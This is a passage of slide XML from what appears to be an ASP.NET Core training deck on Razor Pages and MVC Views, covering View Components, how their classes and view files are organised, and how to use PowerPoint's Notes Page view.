            <a:pPr marL="228600" marR="0" lvl="0" indent="-228600" algn="ctr" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId4"/>
              </a:buBlip>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FFF257A-30C5-4AFB-911B-BE4CEEA1EA82}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="898989"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="374332" y="1718447"/>
            <a:ext cx="5591175" cy="3409950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2826316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Razor Pages &amp; MVC Views</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Section 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>View Fundamentals</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lesson: View Components</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1462422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View Component</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A0AE9EC9-F182-4A35-8041-CBBE9CFA6E78}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Similar to partial views  (Partial View does not have a “code-behind”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Introduced in ASP.NET MVC Core</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Responds like a mini-controller, responsible for rendering a chunk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example scenarios for use:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dynamic navigation menus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tag cloud (where it queries the database)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Logon panel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Shopping cart</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sidebar content on a blog</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Does not use model binding; takes input data parameter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1794233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Component [Class]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A0AE9EC9-F182-4A35-8041-CBBE9CFA6E78}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402336" y="1143000"/>
            <a:ext cx="5541264" cy="4956048"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Derive from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>ViewComponent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Decorate with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>[ViewComponent]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attribute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Derive from a class with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>[ViewComponent] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>attribute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Class name ending with the suffix </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>ViewComponent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Public, non-nested, and non-abstract class like Controllers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6929782" y="5953461"/>
            <a:ext cx="4191000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PriorityListViewComponent.cs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6004179" y="524211"/>
            <a:ext cx="5572125" cy="5429250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1910972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Component [View]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A0AE9EC9-F182-4A35-8041-CBBE9CFA6E78}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Screen Clipping"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="719183" y="1037258"/>
            <a:ext cx="4386217" cy="2473339"/>
          </a:xfrm>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8005418" y="5978091"/>
            <a:ext cx="3576982" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>View using View Component</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219198" y="3512956"/>
            <a:ext cx="5867402" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Views\Todo\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Components</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\PriorityList\Default.cshtml</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057399" y="6007303"/>
            <a:ext cx="4191000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Views\todo\index.cshtml </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7810500" y="1292428"/>
            <a:ext cx="3429000" cy="4714875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="719183" y="4192104"/>
            <a:ext cx="6793812" cy="1065696"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2213712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View Component</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A0AE9EC9-F182-4A35-8041-CBBE9CFA6E78}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Screen Clipping"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="990600"/>
            <a:ext cx="5080000" cy="5384800"/>
          </a:xfrm>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37933300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Demo: View Components</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2049767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dirty="0"/>
              <a:t>How to View This Presentation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29700" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>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457200" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" defTabSz="457200" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" defTabSz="457200" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" defTabSz="457200" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{9019A89C-8DE8-46C7-84B5-6A6C40246841}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To switch to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Notes Page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>view:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-228600" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On the ribbon, click the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>View </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>tab, and then click </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Notes Page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-228600" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To navigate through notes, use the Page Up and Page Down keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-228600" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Zoom in or zoom out, if required</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-228600" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Notes Page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>view, you can:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-228600" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Read any supporting text—now or after the delivery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-228600" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add notes to your copy of the presentation, if required</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-228600" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Take the presentation files home with you</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1960985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Razor Pages &amp; MVC Views</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Section 2: Razor View Engine</a:t>
            </a:r>
          </a:p>
          <a:p>
